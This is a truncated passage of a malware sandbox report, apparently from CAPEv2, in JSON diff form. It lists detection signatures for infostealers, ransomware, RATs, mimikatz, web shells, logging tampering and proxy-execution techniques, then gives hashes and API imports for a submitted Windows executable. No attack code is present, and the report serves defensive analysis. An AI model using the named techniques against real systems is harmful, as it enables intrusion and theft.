"infostealer_mail", + "time": 0.003 + }, + { + "name": "masslogger_files", + "time": 0.0 + }, + { + "name": "poullight_files", + "time": 0.0 + }, + { + "name": "purplewave_mutexes", + "time": 0.0 + }, + { + "name": "quilclipper_mutexes", + "time": 0.0 + }, + { + "name": "qulab_files", + "time": 0.0 + }, + { + "name": "qulab_mutexes", + "time": 0.0 + }, + { + "name": "asyncrat_mutex", + "time": 0.0 + }, + { + "name": "Evade_Execution_Via_ASPNet_Compiler", + "time": 0.0 + }, + { + "name": "Evade_Execute_Via_DeviceCredentialDeployment", + "time": 0.0 + }, + { + "name": "Evade_Execution_Via_Filter_Manager_Control", + "time": 0.0 + }, + { + "name": "Evade_Execution_Via_Intel_GFXDownloadWrapper", + "time": 0.0 + }, + { + "name": "execute_binary_via_appvlp", + "time": 0.0 + }, + { + "name": "execute_binary_via_pcalua", + "time": 0.0 + }, + { + "name": "Execute_Binary_Via_OpenSSH", + "time": 0.0 + }, + { + "name": "execute_binary_via_pcalua", + "time": 0.0 + }, + { + "name": "Execute_Binary_Via_PesterPSModule", + "time": 0.0 + }, + { + "name": "Execute_Binary_Via_ScriptRunner", + "time": 0.0 + }, + { + "name": "execute_binary_via_ttdinject", + "time": 0.0 + }, + { + "name": "Execute_Binary_Via_VisualStudioLiveShare", + "time": 0.0 + }, + { + "name": "Execute_Msiexec_Via_Explorer", + "time": 0.0 + }, + { + "name": "execute_remote_msi", + "time": 0.0 + }, + { + "name": "execute_suspicious_powershell_via_runscripthelper", + "time": 0.0 + }, + { + "name": "execute_suspicious_powershell_via_sqlps", + "time": 0.0 + }, + { + "name": "Indirect_Command_Execution_Via_ConsoleWindowHost", + "time": 0.0 + }, + { + "name": "Perform_Malicious_Activities_Via_Headless_Browser", + "time": 0.0 + }, + { + "name": "Register_DLL_Via_CertOC", + "time": 0.0 + }, + { + "name": "Register_DLL_Via_MSIEXEC", + "time": 0.0 + }, + { + "name": "Register_DLL_Via_Odbcconf", + "time": 0.0 + }, + { + "name": "Scriptlet_Proxy_Execution_Via_Pubprn", + "time": 0.0 + }, + { + "name": "ie_martian_children", + "time": 0.0 + }, + { + "name": "office_martian_children", + "time": 0.0 + }, + { + "name": "mimics_icon", + "time": 0.0 + }, + { + "name": "masquerade_process_name", + "time": 0.001 + }, + { + "name": "mimikatz_modules", + "time": 0.0 + }, + { + "name": "ms_office_cmd_rce", + "time": 0.0 + }, + { + "name": "mount_copy_to_webdav_share", + "time": 0.0 + }, + { + "name": "potential_protocol_tunneling_via_legit_utilities", + "time": 0.0 + }, + { + "name": "potential_protocol_tunneling_via_qemu", + "time": 0.0 + }, + { + "name": "suspicious_execution_via_dotnet_remoting", + "time": 0.0 + }, + { + "name": "modify_certs", + "time": 0.0 + }, + { + "name": "dotnet_clr_usagelog_regkeys", + "time": 0.0 + }, + { + "name": "modify_hostfile", + "time": 0.0 + }, + { + "name": "modify_oem_information", + "time": 0.0 + }, + { + "name": "modify_security_center_warnings", + "time": 0.0 + }, + { + "name": "modify_uac_prompt", + "time": 0.0 + }, + { + "name": "network_dns_blockchain", + "time": 0.0 + }, + { + "name": "network_dns_opennic", + "time": 0.0 + }, + { + "name": "network_dns_paste_site", + "time": 0.0 + }, + { + "name": "network_dns_reverse_proxy", + "time": 0.0 + }, + { + "name": "network_dns_temp_file_storage", + "time": 0.0 + }, + { + "name": "network_dns_temp_urldns", + "time": 0.0 + }, + { + "name": "network_dns_url_shortener", + "time": 0.0 + }, + { + "name": "network_dns_doh_tls", + "time": 0.0 + }, + { + "name": "suspicious_tld", + "time": 0.0 + }, + { + "name": "network_tor_service", + "time": 0.0 + }, + { + "name": "office_code_page", + "time": 0.0 + }, + { + "name": "office_addinloading", + "time": 0.0 + }, + { + "name": "office_perfkey", + "time": 0.0 + }, + { + "name": "office_macro", + "time": 0.0 + }, + { + "name": "changes_trust_center_settings", + "time": 0.0 + }, + { + "name": "disables_vba_trust_access", + "time": 0.0 + }, + { + "name": "office_macro_autoexecution", + "time": 0.0 + }, + { + "name": "office_macro_ioc", + "time": 0.0 + }, + { + "name": "office_macro_malicious_prediction", + "time": 0.0 + }, + { + "name": "office_macro_suspicious", + "time": 0.0 + }, + { + "name": "rtf_aslr_bypass", + "time": 0.0 + }, + { + "name": "rtf_anomaly_characterset", + "time": 0.0 + }, + { + "name": "rtf_anomaly_version", + "time": 0.0 + }, + { + "name": "rtf_embedded_content", + "time": 0.0 + }, + { + "name": "rtf_embedded_office_file", + "time": 0.0 + }, + { + "name": "rtf_exploit_static", + "time": 0.0 + }, + { + "name": "office_security", + "time": 0.0 + }, + { + "name": "office_anomalous_feature", + "time": 0.0 + }, + { + "name": "office_dde_command", + "time": 0.0 + }, + { + "name": "packer_armadillo_mutex", + "time": 0.0 + }, + { + "name": "packer_armadillo_regkey", + "time": 0.0 + }, + { + "name": "persistence_ads", + "time": 0.0 + }, + { + "name": "persistence_safeboot", + "time": 0.0 + }, + { + "name": "persistence_ifeo", + "time": 0.0 + }, + { + "name": "persistence_silent_process_exit", + "time": 0.0 + }, + { + "name": "persistence_rdp_registry", + "time": 0.0 + }, + { + "name": "persistence_rdp_shadowing", + "time": 0.0 + }, + { + "name": "persistence_service", + "time": 0.0 + }, + { + "name": "persistence_shim_database", + "time": 0.0 + }, + { + "name": "powerpool_mutexes", + "time": 0.0 + }, + { + "name": "powershell_scriptblock_logging", + "time": 0.0 + }, + { + "name": "powershell_command_suspicious", + "time": 0.0 + }, + { + "name": "powershell_renamed", + "time": 0.0 + }, + { + "name": "powershell_reversed", + "time": 0.0 + }, + { + "name": "powershell_variable_obfuscation", + "time": 0.0 + }, + { + "name": "prevents_safeboot", + "time": 0.0 + }, + { + "name": "cmdline_process_discovery", + "time": 0.0 + }, + { + "name": "cryptomix_mutexes", + "time": 0.0 + }, + { + "name": "dharma_mutexes", + "time": 0.0 + }, + { + "name": "ransomware_extensions", + "time": 0.001 + }, + { + "name": "ransomware_files", + "time": 0.002 + }, + { + "name": "fonix_mutexes", + "time": 0.0 + }, + { + "name": "gandcrab_mutexes", + "time": 0.0 + }, + { + "name": "germanwiper_mutexes", + "time": 0.0 + }, + { + "name": "medusalocker_mutexes", + "time": 0.0 + }, + { + "name": "medusalocker_regkeys", + "time": 0.0 + }, + { + "name": "nemty_mutexes", + "time": 0.0 + }, + { + "name": "nemty_regkeys", + "time": 0.0 + }, + { + "name": "pysa_mutexes", + "time": 0.0 + }, + { + "name": "ransomware_radamant", + "time": 0.0 + }, + { + "name": "ransomware_recyclebin", + "time": 0.0 + }, + { + "name": "revil_mutexes", + "time": 0.0 + }, + { + "name": "ransomware_revil_regkey", + "time": 0.0 + }, + { + "name": "satan_mutexes", + "time": 0.0 + }, + { + "name": "snake_ransom_mutexes", + "time": 0.0 + }, + { + "name": "stop_ransom_mutexes", + "time": 0.0 + }, + { + "name": "stop_ransomware_cmd", + "time": 0.0 + }, + { + "name": "ransomware_stopdjvu", + "time": 0.0 + }, + { + "name": "rat_beebus_mutexes", + "time": 0.0 + }, + { + "name": "blacknet_mutexes", + "time": 0.0 + }, + { + "name": "blackrat_mutexes", + "time": 0.0 + }, + { + "name": "crat_mutexes", + "time": 0.0 + }, + { + "name": "dcrat_files", + "time": 0.0 + }, + { + "name": "dcrat_mutexes", + "time": 0.0 + }, + { + "name": "rat_fynloski_mutexes", + "time": 0.0 + }, + { + "name": "limerat_mutexes", + "time": 0.0 + }, + { + "name": "limerat_regkeys", + "time": 0.0 + }, + { + "name": "lodarat_file_behavior", + "time": 0.0 + }, + { + "name": "modirat_behavior", + "time": 0.0 + }, + { + "name": "njrat_regkeys", + "time": 0.0 + }, + { + "name": "obliquerat_files", + "time": 0.0 + }, + { + "name": "obliquerat_mutexes", + "time": 0.0 + }, + { + "name": "parallax_mutexes", + "time": 0.0 + }, + { + "name": "rat_pcclient", + "time": 0.0 + }, + { + "name": "rat_plugx_mutexes", + "time": 0.0 + }, + { + "name": "rat_poisonivy_mutexes", + "time": 0.0 + }, + { + "name": "rat_quasar_mutexes", + "time": 0.0 + }, + { + "name": "ratsnif_mutexes", + "time": 0.0 + }, + { + "name": "rat_spynet", + "time": 0.0 + }, + { + "name": "venomrat_mutexes", + "time": 0.0 + }, + { + "name": "warzonerat_files", + "time": 0.0 + }, + { + "name": "warzonerat_regkeys", + "time": 0.0 + }, + { + "name": "xpertrat_files", + "time": 0.0 + }, + { + "name": "xpertrat_mutexes", + "time": 0.0 + }, + { + "name": "rat_xtreme_mutexes", + "time": 0.0 + }, + { + "name": "recon_fingerprint", + "time": 0.001 + }, + { + "name": "remcos_files", + "time": 0.0 + }, + { + "name": "remcos_mutexes", + "time": 0.0 + }, + { + "name": "remcos_regkeys", + "time": 0.0 + }, + { + "name": "rdptcp_key", + "time": 0.0 + }, + { + "name": "uses_rdp_clip", + "time": 0.0 + }, + { + "name": "uses_remote_desktop_session", + "time": 0.0 + }, + { + "name": "removes_networking_icon", + "time": 0.0 + }, + { + "name": "removes_pinned_programs", + "time": 0.0 + }, + { + "name": "removes_security_maintenance_icon", + "time": 0.0 + }, + { + "name": "removes_startmenu_defaults", + "time": 0.0 + }, + { + "name": "removes_username_startmenu", + "time": 0.0 + }, + { + "name": "spicyhotpot_behavior", + "time": 0.0 + }, + { + "name": "sniffer_winpcap", + "time": 0.0 + }, + { + "name": "spreading_autoruninf", + "time": 0.0 + }, + { + "name": "stealth_hidden_extension", + "time": 0.0 + }, + { + "name": "stealth_hiddenreg", + "time": 0.0 + }, + { + "name": "stealth_hide_notifications", + "time": 0.0 + }, + { + "name": "stealth_webhistory", + "time": 0.0 + }, + { + "name": "sysinternals_psexec", + "time": 0.0 + }, + { + "name": "sysinternals_tools", + "time": 0.0 + }, + { + "name": "tampers_etw", + "time": 0.0 + }, + { + "name": "lsa_tampering", + "time": 0.0 + }, + { + "name": "tampers_powershell_logging", + "time": 0.0 + }, + { + "name": "targeted_flame", + "time": 0.0 + }, + { + "name": "territorial_disputes_sigs", + "time": 0.016 + }, + { + "name": "trickbot_mutex", + "time": 0.0 + }, + { + "name": "fleercivet_mutex", + "time": 0.0 + }, + { + "name": "lokibot_mutexes", + "time": 0.0 + }, + { + "name": "ursnif_behavior", + "time": 0.0 + }, + { + "name": "uses_adfind", + "time": 0.0 + }, + { + "name": "uses_ms_protocol", + "time": 0.0 + }, + { + "name": "neshta_mutexes", + "time": 0.0 + }, + { + "name": "renamer_mutexes", + "time": 0.0 + }, + { + "name": "owa_web_shell_files", + "time": 0.0 + }, + { + "name": "web_shell_files", + "time": 0.0 + }, + { + "name": "web_shell_processes", + "time": 0.0 + }, + { + "name": "dotnet_csc_build", + "time": 0.0 + }, + { + "name": "multiple_explorer_instances", + "time": 0.0 + }, + { + "name": "script_tool_executed", + "time": 0.0 + }, + { + "name": "suspicious_certutil_use", + "time": 0.0 + }, + { + "name": "suspicious_command_tools", + "time": 0.0 + }, + { + "name": "suspicious_mpcmdrun_use", + "time": 0.0 + }, + { + "name": "suspicious_ping_use", + "time": 0.0 + }, + { + "name": "uses_powershell_copyitem", + "time": 0.0 + }, + { + "name": "uses_windows_utilities", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_appcmd", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_csvde_ldifde", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_cipher", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_clickonce", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_curl", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_dsquery", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_esentutl", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_finger", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_mode", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_ntdsutil", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_nltest", + "time": 0.0 + }, + { + "name": "uses_windows_utilities_xcopy", + "time": 0.0 + }, + { + "name": "wmic_command_suspicious", + "time": 0.0 + }, + { + "name": "scrcons_wmi_script_consumer", + "time": 0.0 + }, + { + "name": "allaple_mutexes", + "time": 0.0 + } + ], + "reporting": [ + { + "name": "BinGraph", + "time": 0.0 + }, + { + "name": "CAPASummary", + "time": 2.51 + }, + { + "name": "MITRE_TTPS", + "time": 6.993 + }, + { + "name": "PCAP2CERT", + "time": 0.0 + } + ] + }, + "target": { + "category": "file", + "file": { + "name": "0b15348fb954e0b4331e.exe", + "path": "/opt/CAPEv2/storage/binaries/0b15348fb954e0b4331e3f803185713786b747d2591ddb2a8526291e3bea14fe", + "guest_paths": "", + "size": 815417, + "crc32": "C9F62C99", + "md5": "26e9b8b488a0e7a70b14149c3da88bb5", + "sha1": "fa5aae6d154f40083438831b5c017d95d1c64075", + "sha256": "0b15348fb954e0b4331e3f803185713786b747d2591ddb2a8526291e3bea14fe", + "sha512": "32f32561cd25bedfcbc07d733767c9405a1eee2dfa7acfe442fbae93a0c2de88fab8d5e3968107cab6dab3d5e7025ee19b60e88c7f62aa5aa14bbb94ba3067a7", + "rh_hash": null, + "ssdeep": "12288:1+qZeZwyILgZi6YZmX/JHnfm+BSQPLv3VSQZJZnGMUMRPQED+:4uLgZPxxHnACv3HJNGMtG", + "type": "PE32 executable (GUI) Intel 80386, for MS Windows", + "yara": [], + "cape_yara": [], + "clamav": [], + "tlsh": "T15F057E117BFAC029F6F34E305EE177B699BAFEA16D21858B2281051D4D36E80CD75B32", + "sha3_384": "23a54432c18c2352f53fb489131e50813a1f2a856b319b931f69fe28fe57baf08e634f9fa2596541d69c90844a731deb", + "pe": { + "guest_signers": { + "aux_sha1": null, + "aux_timestamp": null, + "aux_valid": false, + "aux_error": true, + "aux_error_desc": "No signature found.", + "aux_signers": [] + }, + "digital_signers": [], + "imagebase": "0x00400000", + "entrypoint": "0x00010dee", + "ep_bytes": "558bec6aff68b0cf4400685468410064", + "peid_signatures": null, + "reported_checksum": "0x00000000", + "actual_checksum": "0x000d5537", + "osversion": "4.0", + "pdbpath": null, + "imports": { + "OPENGL32": { + "dll": "OPENGL32.dll", + "imports": [ + { + "address": "0x4473dc", + "name": "glGenTextures" + }, + { + "address": "0x4473e0", + "name": "glGetError" + }, + { + "address": "0x4473e4", + "name": "glEnd" + }, + { + "address": "0x4473e8", + "name": "glTexImage2D" + }, + { + "address": "0x4473ec", + "name": "glDeleteTextures" + }, + { + "address": "0x4473f0", + "name": "glViewport" + }, + { + "address": "0x4473f4", + "name": "glMatrixMode" + }, + { + "address": "0x4473f8", + "name": "glLoadIdentity" + }, + { + "address": "0x4473fc", + "name": "glDrawBuffer" + }, + { + "address": "0x447400", + "name": "wglGetCurrentContext" + }, + { + "address": "0x447404", + "name": "wglDeleteContext" + }, + { + "address": "0x447408", + "name": "wglCreateContext" + }, + { + "address": "0x44740c", + "name": "wglMakeCurrent" + }, + { + "address": "0x447410", + "name": "glClear" + }, + { + "address": "0x447414", + "name": "glTranslated" + }, + { + "address": "0x447418", + "name": "glFlush" + }, + { + "address": "0x44741c", + "name": "glLightfv" + }, + { + "address": "0x447420", + "name": "glLightModelf" + }, + { + "address": "0x447424", + "name": "glClearColor" + }, + { + "address": "0x447428", + "name": "glClearDepth" + }, + { + "address": "0x44742c", + "name": "glBlendFunc" + }, + { + "address": "0x447430", + "name": "glTexParameterf" + }, + { + "address": "0x447434", + "name": "glTexEnvf" + }, + { + "address": "0x447438", + "name": "glShadeModel" + }, + { + "address": "0x44743c", + "name": "glPolygonMode" + }, + { + "address": "0x447440", + "name": "glDisable" + }, + { + "address": "0x447444", + "name": "glEnable" + }, + { + "address": "0x447448", + "name": "glPolygonOffset" + }, + { + "address": "0x44744c", + "name": "glIsList" + }, + { + "address": "0x447450", + "name": "glCallList" + }, + { + "address": "0x447454", + "name": "glDeleteLists" + }, + { + "address": "0x447458", + "name": "glGenLists" + }, + { + "address": "0x44745c", + "name": "glNewList" + }, + { + "address": "0x447460", + "name": "glNormal3f" + }, + { + "address": "0x447464", + "name": "glTexCoord2f" + }, + { + "address": "0x447468", + "name": "glEndList" + }, + { + "address": "0x44746c", + "name": "glPushMatrix" + }, + { + "address": "0x447470", + "name": "glTranslatef" + }, + { + "address": "0x447474", + "name": "glScalef" + }, + { + "address": "0x447478", + "name": "glRotatef" + }, + { + "address": "0x44747c", + "name": "glPopMatrix" + }, + { + "address": "0x447480", + "name": "glColor3ub" + }, + { + "address": "0x447484", + "name": "glBegin" + }, + { + "address": "0x447488", + "name": "glVertex3f" + }, + { + "address": "0x44748c", + "name": "glBindTexture" + } + ] + }, + "GLU32": { + "dll": "GLU32.dll", + "imports": [ + { + "address": "0x447198", + "name": "gluNewQuadric" + }, + { + "address": "0x44719c", + "name": "gluSphere" + }, + { + "address": "0x4471a0", + "name": "gluPerspective" + } + ] + }, + "KERNEL32": { + "dll": "KERNEL32.dll", + "imports": [ + { + "address": "0x4471a8", + "name": "TlsSetValue" + }, + { + "address": "0x4471ac", + "name": "LocalReAlloc" + }, + { + "address": "0x4471b0", + "name": "TlsGetValue" + }, + { + "address": "0x4471b4", + "name": "GetCPInfo" + }, + { + "address": "0x4471b8", + "name": "GetOEMCP" + }, + { + "address": "0x4471bc", + "name": "SizeofResource" + }, + { + "address": "0x4471c0", + "name": "GetCurrentDirectoryA" + }, + { + "address": "0x4471c4", + "name": "GetFileSize" + }, + { + "address": "0x4471c8", + "name": "LocalFileTimeToFileTime" + }, + { + "address": "0x4471cc", + "name": "SystemTimeToFileTime" + }, + { + "address": "0x4471d0", + "name": "SetErrorMode" + }, + { + "address": "0x4471d4", + "name": "FileTimeToSystemTime" + }, + { + "address": "0x4471d8", + "name": "FileTimeToLocalFileTime" + }, + { + "address": "0x4471dc", + "name": "GetTickCount" + }, + { + "address": "0x4471e0", + "name": "RtlUnwind" + }, + { + "address": "0x4471e4", + "name": "HeapAlloc" + }, + { + "address": "0x4471e8", + "name": "GetStartupInfoA" + }, + { + "address": "0x4471ec", + "name": "GetCommandLineA" + }, + { + "address": "0x4471f0", + "name": "ExitProcess" + }, + { + "address": "0x4471f4", + "name": "HeapFree" + }, + { + "address": "0x4471f8", + "name": "RaiseException" + }, + { + "address": "0x4471fc", + "name": "TerminateProcess" + }, + { + "address": "0x447200", + "name": "SetStdHandle" + }, + { + "address": "0x447204", + "name": "GetFileType" + }, + { + "address": "0x447208", + "name": "HeapReAlloc" + }, + { + "address": "0x44720c", + "name": "HeapSize" + }, + { + "address": "0x447210", + "name": "GetACP" + }, + { + "address": "0x447214", + "name": "GetTimeZoneInformation" + }, + { + "address": "0x447218", + "name": "EnterCriticalSection" + }, + { + "address": "0x44721c", + "name": "HeapDestroy" + }, + { + "address": "0x447220", + "name": "HeapCreate" + }, + { + "address": "0x447224", + "name": "VirtualFree" + }, + { + "address": "0x447228", + "name": "VirtualAlloc" + }, + { + "address": "0x44722c", + "name": "IsBadWritePtr" + }, + { + "address": "0x447230", + "name": "UnhandledExceptionFilter" + }, + { + "address": "0x447234", + "name": "FreeEnvironmentStringsA" + }, + { + "address": "0x447238", + "name": "FreeEnvironmentStringsW" + }, + { + "address": "0x44723c", + "name": "GetEnvironmentStrings" + }, + { + "address": "0x447240", + "name": "GetEnvironmentStringsW" + }, + { + "address": "0x447244", + "name": "SetHandleCount" + }, + { + "address": "0x447248", + "name": "GetStdHandle" + }, + { + "address": "0x44724c", + "name": "SetUnhandledExceptionFilter" + }, + { + "address": "0x447250", + "name": "LCMapStringA" + }, + { + "address": "0x447254", + "name": "LCMapStringW" + }, + { + "address": "0x447258", + "name": "DeleteCriticalSection" + }, + { + "address": "0x44725c", + "name": "GetStringTypeW" + }, + { + "address": "0x447260", + "name": "Sleep" + }, + { + "address": "0x447264", + "name": "IsBadReadPtr" + }, + { + "address": "0x447268", + "name": "IsBadCodePtr" + }, + { + "address": "0x44726c", + "name": "CompareStringA" + }, + { + "address": "0x447270", + "name": "CompareStringW" + }, + { + "address": "0x447274", + "name": "SetEnvironmentVariableA" + }, + { + "address": "0x447278", + "name": "TlsAlloc" + }, + { + "address": "0x44727c", + "name": "GetProfileStringA" + }, + { + "address": "0x447280", + "name": "InterlockedExchange" + }, + { + "address": "0x447284", + "name": "GlobalReAlloc" + }, + { + "address": "0x447288", + "name": "LeaveCriticalSection" + }, + { + "address": "0x44728c", + "name": "TlsFree" + }, + { + "address": "0x447290", + "name": "GlobalHandle" + }, + { + "address": "0x447294", + "name": "GetProcAddress" + }, + { + "address": "0x447298", + "name": "LoadLibraryW" + }, + { + "address": "0x44729c", + "name": "SetCurrentDirectoryA" + }, + { + "address": "0x4472a0", + "name": "GlobalUnlock" + }, + { + "address": "0x4472a4", + "name": "GlobalLock" + }, + { + "address": "0x4472a8", + "name": "GlobalAlloc" + }, + { + "address": "0x4472ac", + "name": "lstrlenA" + }, + { + "address": "0x4472b0", + "name": "lstrcpyA" + }, + { + "address": "0x4472b4", + "name": "GetVersion" + }, + { + "address": "0x4472b8", + "name": "GlobalAddAtomA" + }, + { + "address": "0x4472bc", + "name": "GlobalGetAtomNameA" + }, + { + "address": "0x4472c0", + "name": "lstrcpynA" + }, + { + "address": "0x4472c4", + "name": "lstrcatA" + }, + { + "address": "0x4472c8", + "name": "GetModuleHandleA" + }, + { + "address": "0x4472cc", + "name": "GlobalDeleteAtom" + }, + { + "address": "0x4472d0", + "name": "GlobalFindAtomA" + }, + { + "address": "0x4472d4", + "name": "lstrcmpiA" + }, + { + "address": "0x4472d8", + "name": "GetCurrentThreadId" + }, + { + "address": "0x4472dc", + "name": "LockResource" + }, + { + "address": "0x4472e0", + "name": "LoadResource" + }, + { + "address": "0x4472e4", + "name": "FindResourceA" + }, + { + "address": "0x4472e8", + "name": "FreeLibrary" + }, + { + "address": "0x4472ec", + "name": "LoadLibraryA" + }, + { + "address": "0x4472f0", + "name": "GlobalFree" + }, + { + "address": "0x4472f4", + "name": "lstrcmpA" + }, + { + "address": "0x4472f8", + "name": "GetCurrentThread" + }, + { + "address": "0x4472fc", + "name": "GetModuleFileNameA" + }, + { + "address": "0x447300", + "name": "CloseHandle" + }, + { + "address": "0x447304", + "name": "InitializeCriticalSection" + }, + { + "address": "0x447308", + "name": "LocalAlloc" + }, + { + "address": "0x44730c", + "name": "GlobalFlags" + }, + { + "address": "0x447310", + "name": "GetProcessVersion" + }, + { + "address": "0x447314", + "name": "GetShortPathNameA" + }, + { + "address": "0x447318", + "name": "GetThreadLocale" + }, + { + "address": "0x44731c", + "name": "GetStringTypeExA" + }, + { + "address": "0x447320", + "name": "GetVolumeInformationA" + }, + { + "address": "0x447324", + "name": "FindFirstFileA" + }, + { + "address": "0x447328", + "name": "FindClose" + }, + { + "address": "0x44732c", + "name": "DeleteFileA" + }, + { + "address": "0x447330", + "name": "MoveFileA" + }, + { + "address": "0x447334", + "name": "SetEndOfFile" + }, + { + "address": "0x447338", + "name": "UnlockFile" + }, + { + "address": "0x44733c", + "name": "LockFile" + }, + { + "address": "0x447340", + "name": "FlushFileBuffers" + }, + { + "address": "0x447344", + "name": "SetFilePointer" + }, + { + "address": "0x447348", + "name": "WriteFile" + }, + { + "address": "0x44734c", + "name": "ReadFile" + }, + { + "address": "0x447350", + "name": "CreateFileA" + }, + { + "address": "0x447354", + "name": "GetCurrentProcess" + }, + { + "address": "0x447358", + "name": "DuplicateHandle" + }, + { + "address": "0x44735c", + "name": "MulDiv" + }, + { + "address": "0x447360", + "name": "GetDiskFreeSpaceA" + }, + { + "address": "0x447364", + "name": "GetFileTime" + }, + { + "address": "0x447368", + "name": "SetFileTime" + }, + { + "address": "0x44736c", + "name": "GetFullPathNameA" + }, + { + "address": "0x447370", + "name": "GetTempFileNameA" + }, + { + "address": "0x447374", + "name": "GetFileAttributesA" + }, + { + "address": "0x447378", + "name": "FormatMessageA" + }, + { + "address": "0x44737c", + "name": "LocalFree" + }, + { + "address": "0x447380", + "name": "GetLastError" + }, + { + "address": "0x447384", + "name": "SetLastError" + }, + { + "address": "0x447388", + "name": "MultiByteToWideChar" + }, + { + "address": "0x44738c", + "name": "WideCharToMultiByte" + }, + { + "address": "0x447390", + "name": "InterlockedDecrement" + }, + { + "address": "0x447394", + "name": "InterlockedIncrement" + }, + { + "address": "0x447398", + "name": "WritePrivateProfileStringA" + }, + { + "address": "0x44739c", + "name": "GetPrivateProfileStringA" + }, + { + "address": "0x4473a0", + "name": "GetPrivateProfileIntA" + }, + { + "address": "0x4473a4", + "name": "GetStringTypeA" + } + ] + }, + "USER32": { + "dll": "USER32.dll", + "imports": [ + { + "address": "0x4474ac", + "name": "CopyAcceleratorTableA" + }, + { + "address": "0x4474b0", + "name": "GetNextDlgGroupItem" + }, + { + "address": "0x4474b4", + "name": "MessageBeep" + }, + { + "address": "0x4474b8", + "name": "FindWindowA" + }, + { + "address": "0x4474bc", + "name": "GetTabbedTextExtentA" + }, + { + "address": "0x4474c0", + "name": "RegisterClipboardFormatA" + }, + { + "address": "0x4474c4", + "name": "PostThreadMessageA" + }, + { + "address": "0x4474c8", + "name": "GetDCEx" + }, + { + "address": "0x4474cc", + "name": "InvertRect" + }, + { + "address": "0x4474d0", + "name": "InflateRect" + }, + { + "address": "0x4474d4", + "name": "GetClassNameA" + }, + { + "address": "0x4474d8", + "name": "GetSysColorBrush" + }, + { + "address": "0x4474dc", + "name": "CharUpperA" + }, + { + "address": "0x4474e0", + "name": "GrayStringA" + }, + { + "address": "0x4474e4", + "name": "DrawTextA" + }, + { + "address": "0x4474e8", + "name": "TabbedTextOutA" + }, + { + "address": "0x4474ec", + "name": "EndPaint" + }, + { + "address": "0x4474f0", + "name": "BeginPaint" + }, + { + "address": "0x4474f4", + "name": "GetWindowDC" + }, + { + "address": "0x4474f8", + "name": "FillRect" + }, + { + "address": "0x4474fc", + "name": "LoadCursorA" + }, + { + "address": "0x447500", + "name": "DestroyCursor" + }, + { + "address": "0x447504", + "name": "MapDialogRect" + }, + { + "address": "0x447508", + "name": "SetWindowContextHelpId" + }, + { + "address": "0x44750c", + "name": "GetMessageA" + }, + { + "address": "0x447510", + "name": "TranslateMessage" + }, + { + "address": "0x447514", + "name": "ValidateRect" + }, + { + "address": "0x447518", + "name": "ShowOwnedPopups" + }, + { + "address": "0x44751c", + "name": "PostQuitMessage" + }, + { + "address": "0x447520", + "name": "EndDialog" + }, + { + "address": "0x447524", + "name": "CreateDialogIndirectParamA" + }, + { + "address": "0x447528", + "name": "SetRect" + }, + { + "address": "0x44752c", + "name": "GetCursorPos" + }, + { + "address": "0x447530", + "name": "ClientToScreen" + }, + { + "address": "0x447534", + "name": "WindowFromPoint" + }, + { + "address": "0x447538", + "name": "KillTimer" + }, + { + "address": "0x44753c", + "name": "SetTimer" + }, + { + "address": "0x447540", + "name": "GetSystemMenu" + }, + { + "address": "0x447544", + "name": "DeleteMenu" + }, + { + "address": "0x447548", + "name": "AppendMenuA" + }, + { + "address": "0x44754c", + "name": "IsRectEmpty" + }, + { + "address": "0x447550", + "name": "SetParent" + }, + { + "address": "0x447554", + "name": "PtInRect" + }, + { + "address": "0x447558", + "name": "IsZoomed" + }, + { + "address": "0x44755c", + "name": "GetMenuCheckMarkDimensions" + }, + { + "address": "0x447560", + "name": "LoadBitmapA" + }, + { + "address": "0x447564", + "name": "GetMenuState" + }, + { + "address": "0x447568", + "name": "ModifyMenuA" + }, + { + "address": "0x44756c", + "name": "SetMenuItemBitmaps" + }, + { + "address": "0x447570", + "name": "CheckMenuItem" + }, + { + "address": "0x447574", + "name": "EnableMenuItem" + }, + { + "address": "0x447578", + "name": "GetNextDlgTabItem" + }, + { + "address": "0x44757c", + "name": "MoveWindow" + }, + { + "address": "0x447580", + "name": "SetWindowTextA" + }, + { + "address": "0x447584", + "name": "IsDialogMessageA" + }, + { + "address": "0x447588", + "name": "SetDlgItemTextA" + }, + { + "address": "0x44758c", + "name": "SendDlgItemMessageA" + }, + { + "address": "0x447590", + "name": "MapWindowPoints" + }, + { + "address": "0x447594", + "name": "GetSysColor" + }, + { + "address": "0x447598", + "name": "CharNextA" + }, + { + "address": "0x44759c", + "name": "DeferWindowPos" + }, + { + "address": "0x4475a0", + "name": "BeginDeferWindowPos" + }, + { + "address": "0x4475a4", + "name": "EndDeferWindowPos" + }, + { + "address": "0x4475a8", + "name": "ScrollWindow" + }, + { + "address": "0x4475ac", + "name": "GetScrollInfo" + }, + { + "address": "0x4475b0", + "name": "SetScrollInfo" + }, + { + "address": "0x4475b4", + "name": "ShowScrollBar" + }, + { + "address": "0x4475b8", + "name": "GetScrollRange" + }, + { + "address": "0x4475bc", + "name": "SetScrollRange" + }, + { + "address": "0x4475c0", + "name": "GetScrollPos" + }, + { + "address": "0x4475c4", + "name": "SetScrollPos" + }, + { + "address": "0x4475c8", + "name": "GetTopWindow" + }, + { + "address": "0x4475cc", + "name": "MessageBoxA" + }, + { + "address": "0x4475d0", + "name": "IsChild" + }, + { + "address": "0x4475d4", + "name": "RegisterClassA" + }, + { + "address": "0x4475d8", + "name": "GetWindowTextLengthA" + }, + { + "address": "0x4475dc", + "name": "GetWindowTextA" + }, + { + "address": "0x4475e0", + "name": "DefWindowProcA" + }, + { + "address": "0x4475e4", + "name": "DestroyWindow" + }, + { + "address": "0x4475e8", + "name": "SetWindowsHookExA" + }, + { + "address": "0x4475ec", + "name": "CallNextHookEx" + }, + { + "address": "0x4475f0", + "name": "GetClassLongA" + }, + { + "address": "0x4475f4", + "name": "SetPropA" + }, + { + "address": "0x4475f8", + "name": "UnhookWindowsHookEx" + }, + { + "address": "0x4475fc", + "name": "GetPropA" + }, + { + "address": "0x447600", + "name": "CallWindowProcA" + }, + { + "address": "0x447604", + "name": "RemovePropA" + }, + { + "address": "0x447608", + "name": "GetMessageTime" + }, + { + "address": "0x44760c", + "name": 